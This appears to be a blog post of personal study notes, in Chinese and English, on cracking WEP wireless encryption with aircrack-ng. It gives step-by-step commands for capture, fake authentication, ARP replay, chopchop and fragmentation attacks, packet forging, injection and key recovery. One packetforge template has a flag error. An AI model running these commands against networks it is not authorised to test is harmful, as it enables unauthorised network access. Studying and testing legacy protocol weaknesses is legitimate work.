#Crack WEP , WEP因为是明文传递的IV,所以是不安全的协议,我用RTL8812AU sniff了半天,没有发现有一个WEP的。足见现在学习WEP 破解也是屠龙之术,
我也没有将我自己的路由器调成WEP模式来尝试破解,所以屠龙就屠龙吧。
it use RC4 each packet is encrypted at the AP and then decrypted at the client,
WEP insures that each packet has a unique key stream by using a random 24-bit
initializing Vector(IV),this IV is contained in the packeets as plain text.
The short IV means in a busy network we can collect more than two packets with the same IV.
then we can use aircrack-ng to determine the key stream and the WEP key using
statistical attacks.
Conclusion: The more IV's that we collected the more likely for us to crack the key.
#keep both programs running at the same time and aircrack-ng will be able to
determine the
#log all traffic from the target network
airodump-ng --channel[channel] -bssid[bssid] --write[file-name] [interface]
airodump-ng --channel 2 -bssid 18102He --write 18102He wlan1
#try to crack
aircrack-ng out-01.cap
#when the AP was idle, or had no clients associated with it?
we have to inject packets into the traffic in order to force the router
to create new packets with new IV's.
3 methods to increase the number of IV's rapidly in clientless AP's.
#inject packets into the traffic, we have to authenticate our wifi card with the AP, because
AP's ignore any requests that come from devices that are not associated with the AP.
This can be done easily using airmon-ng like so.
aireplay-ng --fakeauth 0 -a[target MAC] -h [your MAC] [interface]
aireplay-ng --fakeauth 0 -a E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 wlan1
#if this fake authentication was successful the value under the "AUH" column in
airodump-ng will change to "OPN"
#3 methods to do Packet injection
1: ARP request reply.for AP to generate ARP packet.
aireplay-ng --arpreplay -b [target MAC] -h [your MAC] [interface]
eg: aireplay-ng --arpreplay -b E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 wlan1
2: Korek chop chop
we will capture an ARP packet and attempt to guess its key stream and use it to forge a new packet (using packetforge-ng)
,then we can inject this new forged packet into the traffic to generate new IV's.
<1>: capture a packet and determine its key stream ,生成两个文件,一个cap文件,一个xor文件.
aireplay-ng --chopchop -b [target MAC] -h [your MAC] [interface]
eg:
aireplay-ng --chopchop -b E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 wlan1
<2>: Forge a new packet
packetforge-ng -0 -a [target AMC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -h [out from last step.xor] -w [output]
eg:
packetforge-ng -0 -a E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 -k 255.255.255.255. -l 255.255.255.255 -y 1122out.xor -w chop-out
<3>:inject the forged packet into the traffic to generate new IV's
aireplay-ng -2 -r [out from last step] [interface]
eg:
aireplay-ng -2 -r chop-out wlan1
3: Fragmentation Attack
The goal of this method is to obtain 1500 bytes of the PRGA(pseudo random generation algorithm),this can be used to forge
a new packet which can be injected into the traffic to generate new IV's.
<1>: Obtain PRGA, will create a xor file.
aireplay-ng --fragment -b [target MAC] -h [you MAC] [interface]
eg:
aireplay-ng --fragment -b E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 wlan1
<2>: Forge a new packet.
packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step .xor] -w [output]
eg:
packetforge-ng -0 -a E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w chop-out
<3>: Inject the forged packet into the traffic to generate new IV's
aireplay-ng -2 -r [out from last step] [interface]
eg:
aireplay-ng -2 -r chop-out wlan1
阅读(1021) | 评论(0) | 转发(0) |